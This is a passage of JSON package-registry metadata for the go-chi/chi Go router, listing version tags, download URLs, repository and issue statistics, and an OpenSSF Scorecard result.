eload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.131Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:guix/go-github-com-go-chi-chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/go-github-com-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/go-github-com-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/go-github-com-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":32257,"maintainers_count":0,"namespaces_count":0,"keywords_count":1649,"github":"guix-mirror","metadata":{"funded_packages_count":882},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-08-12T05:05:19.604Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":14154968,"name":"github.com/go-chi/chi/_examples/versions","ecosystem":"go","description":"Versions\n========\nThis example demonstrates the use of the render subpackage, with\na quick concept for how to support multiple api versions.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi/chi/_examples","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-03-31T08:30:16.351Z","latest_release_number":null,"last_synced_at":"2026-08-08T10:51:33.848Z","created_at":"2026-03-31T08:30:13.358Z","updated_at":"2026-08-08T10:51:35.089Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi/_examples/versions","install_command":"go get github.com/go-chi/chi/_examples/versions","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi/_examples/versions#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/